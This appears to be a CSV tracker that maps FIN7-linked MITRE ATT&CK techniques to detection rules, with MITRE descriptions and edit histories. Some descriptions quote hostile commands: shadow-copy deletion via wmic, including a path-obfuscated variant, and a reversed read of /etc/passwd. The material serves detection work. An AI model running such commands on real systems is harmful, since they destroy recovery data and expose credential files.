Technique ID,Name,Tactics,Status,Linked Rule,Liczba wykryć,Author,Description,MITRE Link,ChangeHistory
T1005,Data from Local System,Collection,Pending,alerts\FIN7\T1005_Data_from_Local_System.html,,APT Matrix Generator,"Adversaries may search local system sources, such as file systems, configuration files, local databases, or virtual machine files, to find files of interest and sensitive data prior to Exfiltration.  Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. ",https://attack.mitre.org/techniques/T1005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1008,Fallback Channels,Command-And-Control,Pending,alerts\FIN7\T1008_Fallback_Channels.html,,APT Matrix Generator,Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.,https://attack.mitre.org/techniques/T1008/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1021.001,Remote Desktop Protocol,Lateral-Movement,Pending,alerts\FIN7\T1021.001_Remote_Desktop_Protocol.html,,APT Matrix Generator,Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.  Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)   Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware),https://attack.mitre.org/techniques/T1021/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1021.004,SSH,Lateral-Movement,Pending,alerts\FIN7\T1021.004_SSH.html,,APT Matrix Generator,"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.  SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).",https://attack.mitre.org/techniques/T1021/004/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1021.005,VNC,Lateral-Movement,Pending,alerts\FIN7\T1021.005_VNC.html,,APT Matrix Generator,"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)  VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)  Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)",https://attack.mitre.org/techniques/T1021/005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1027.010,Command Obfuscation,Defense-Evasion,Pending,alerts\FIN7\T1027.010_Command_Obfuscation.html,,APT Matrix Generator,"Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)  For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)  Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)  Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)",https://attack.mitre.org/techniques/T1027/010/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1027.016,Junk Code Insertion,Defense-Evasion,Pending,alerts\FIN7\T1027.016_Junk_Code_Insertion.html,,APT Matrix Generator,"Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)  No-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)  The use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature.   ",https://attack.mitre.org/techniques/T1027/016/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1033,System Owner/User Discovery,Discovery,Pending,alerts\FIN7\T1033_System_OwnerUser_Discovery.html,,APT Matrix Generator,"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.  Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.  On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)",https://attack.mitre.org/techniques/T1033/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1036.004,Masquerade Task or Service,Defense-Evasion,Pending,alerts\FIN7\T1036.004_Masquerade_Task_or_Service.html,,APT Matrix Generator,"Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.  Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",https://attack.mitre.org/techniques/T1036/004/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1036.005,Match Legitimate Resource Name or Location,Defense-Evasion,Pending,alerts\FIN7\T1036.005_Match_Legitimate_Resource_Name_or_Location.html,,APT Matrix Generator,"Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation.   This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)",https://attack.mitre.org/techniques/T1036/005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1047,Windows Management Instrumentation,Execution,Pending,alerts\FIN7\T1047_Windows_Management_Instrumentation.html,,APT Matrix Generator,"Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.  The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)  An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)  **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)",https://attack.mitre.org/techniques/T1047/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1053.005,Scheduled Task,"Execution, Persistence, Privilege-Escalation",Pending,alerts\FIN7\T1053.005_Scheduled_Task.html,,APT Matrix Generator,"Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)  An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)  Adversaries may also create ""hidden"" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ",https://attack.mitre.org/techniques/T1053/005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1059,Command and Scripting Interpreter,Execution,Pending,alerts\FIN7\T1059_Command_and_Scripting_Interpreter.html,,APT Matrix Generator,"Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).  There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).  Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)",https://attack.mitre.org/techniques/T1059/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1059.001,PowerShell,Execution,Tested,alerts\FIN7\T1059.001_PowerShell.html,,APT Matrix Generator,"Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).  PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.  A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)  PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",https://attack.mitre.org/techniques/T1059/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1059.003,Windows Command Shell,Execution,Pending,alerts\FIN7\T1059.003_Windows_Command_Shell.html,,APT Matrix Generator,"Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)  Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.  Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",https://attack.mitre.org/techniques/T1059/003/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
